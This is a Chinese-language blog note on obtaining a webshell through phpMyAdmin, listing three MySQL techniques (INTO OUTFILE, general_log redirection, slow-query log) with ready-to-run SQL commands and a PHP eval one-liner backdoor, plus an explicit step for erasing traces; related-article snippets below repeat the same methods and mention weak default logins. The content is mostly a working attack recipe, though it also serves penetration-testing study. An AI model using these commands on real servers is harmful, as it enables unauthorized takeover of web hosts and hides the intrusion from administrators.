phpmyadmin常见getshell的方法

最新推荐文章于 2024-09-11 20:05:26 发布
最新推荐文章于 2024-09-11 20:05:26 发布
阅读量2.5k 收藏 6
点赞数
分类专栏: 笔记 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45495060/article/details/125221896
版权

一、select into outfile直接写入

1、利用条件

对web目录需要有写权限能够使用单引号(root)

知道网站绝对路径(phpinfo/php探针/通过报错等)

secure_file_priv没有具体值

select @@basedir;                                                    查找绝对路径

show global variables like '%secure_file_priv%';       查看有没有配置 secure_file_priv 功能

NULL                                                                         表示不允许导入或导出
/tmp                                                                           表示只允许在 /tmp 目录导入导出
空                                                                               表示不限制目录

2、如果满足以上条件可以直接写shell

select "<?php @eval($_POST[cc]);?>" into outfile '/网站绝对路径/shell.php'

二、日志文件写 shell

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容那么就可以成功 getshell:

1、SHOW VARIABLES LIKE '%general%'                     查看配置默认是关闭状态

2、set global general_log = on;                                      开启general_log模式

3、set global general_log_file='日志路径\shell.php';       修改日志目录为shell地址 

4、select '<?php eval($_POST[cmd]);?>'                        写入shell因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

  

5、抹除痕迹
set global general_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';        修改日志目录为原来地址
set global general_log = off;                                                                      关闭general_log模式

三、慢查询写入webshell

在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。

在高版本的mysql中默认为NULL,就是不让导入和导出

解决办法:

在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=

在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_priv=

使用慢查询日志绕过此限制

1、show variables like '%slow_query_log%';                                            查看慢查询日志开启情况

2、set global slow_query_log=on;                                                             开启慢查询日志

3、set global slow_query_log_file='C:/phpStudy/WWW/shell.php';          修改日志文件存储的绝对路径

4、select '<?php @eval($_POST[shell]);?>' or sleep(10);                         向日志文件中写入shell

5、使用慢查询日志时,只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中,使用如下语句可查看系统时间:
show global variables like '%long_query_time%';           

一笼管汤包
关注
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1947
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 677
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
phpmyadmin页面getshell
qq_52469895的博客
04-10 2450
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
【getshellphpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 822
访问一下 最后getshell
phpmyadmin getshell
YouthBelief的博客
11-11 5189
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1132
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
PhpMyadmin--getshell
qq_64664156的博客
09-20 707
phpMyAdmin通过MySQL日志文件getshell
getshell方法总结
tell_me_404的博客
03-09 3806
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 ...
getshellPhpmyadmin写日志
MoCoCN的博客
08-30 688
@MoCoCN Phpmyadmin写日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4375
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
PHPmyadmin Getshell
Grey的博客
07-21 6924
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
通过phpMyadmin后台获取shell(getshell
qq_46527080的博客
12-07 2684
通过phpMyadmin后台获取shell 前提: 1.要知道靶机的mysql用户名和密码 2.能成功登录到靶机phpmyadmin中 先登入对方phpmyadmin 然后找到执行sql语句的框架 1.开启日志 set global general_log='on' 2.指定日志写入的文件,就是一句话木马写入的路径 set global general_log_file ="C:/php/PHPTutorial/WWW/she.php" 注意:一定注意路径的斜杠一定是/不是复制的路径 查看靶机根目录,发
phpmyadmin后台getshell方法学习总结
0nc3的博客
11-06 3168
0x00 前言 最近看的一篇文章中提到过phpmyadmin一些后台getshell方式,就想着写篇博客学习总结一下~~ 0x01 getshell方法 一、select into outfile直接写入 1.利用条件 对web目录需要有写权限能够使用单引号 知道绝对路径 没有配置secure_file_priv 2.步骤 先使用show global variables like '%secu...
phpMyAdmin 4.0.10 文件包含 -> getshell
2301_80115097的博客
06-25 929
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
phpmyadmin后台getshell
2301_78533452的博客
09-11 421
查询一句话木马 select "<?上传木马 set global general_log='on';打开phpmyadmin,打开SQL输入界面。打开she.php发现里面出现一句话木马。在浏览器访问she.php文件。右键就可以get shell了。连接密码为一句话木马中的。成功访问,用蚁剑连接。
复现phpmyadmin后台getshell
最新发布
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值